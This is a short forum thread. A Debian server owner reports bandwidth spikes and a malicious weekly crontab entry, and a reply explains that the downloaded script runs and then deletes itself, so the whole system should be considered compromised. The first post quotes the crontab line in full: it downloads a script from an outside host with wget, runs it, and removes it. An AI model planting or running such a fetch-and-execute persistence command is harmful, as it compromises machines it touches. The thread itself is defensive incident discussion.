Regards,

since my server acted "weird" lately (pulling high bandwith during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

A quick google search led me to the following CentOs (I'm running Debian) forum page:

https://www.centos.org/forums/viewtopic ... 17&t=48804

Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:

root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt  6 root root    4.0K Jan  4 13:45 .
drwxr-xr-x 24 root root    4.0K Jan  4 05:14 ..
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .X11-unix
-rw-r--r--  1 root root       0 Jan  4 13:16 .sh
drwxr-xr-x  2 root root    4.0K Dec 23 23:39 .webmin

Anyone able to provide more info with a means to make sure the system is clean ?
I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.


Regards,

The crontab runs the script and then deletes it, which is why you don't see a file in /tmp. While the script is running, Linux keeps the file in memory even though it doesn't have a name any longer.

I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?